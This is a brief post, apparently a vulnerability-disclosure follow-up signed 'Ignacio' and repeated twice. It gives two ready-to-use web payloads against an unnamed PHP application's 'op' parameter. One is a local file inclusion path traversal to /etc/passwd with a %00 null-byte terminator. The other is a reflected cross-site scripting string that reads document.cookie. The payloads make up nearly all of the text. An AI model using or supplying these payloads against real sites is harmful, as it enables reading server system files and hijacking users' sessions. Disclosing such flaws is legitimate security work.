One thing i forgot, a %00 must be included at the end of the LFI, IE: index.php?op=../../../../../../../etc/passwd%00 And ?op is vulnerable to a xss attack, IE: index.php?op=<script>alert(document.cookie)</script> Ignacio.
One thing i forgot, a %00 must be included at the end of the LFI, IE: index.php?op=../../../../../../../etc/passwd%00 And ?op is vulnerable to a xss attack, IE: index.php?op=<script>alert(document.cookie)</script> Ignacio.
|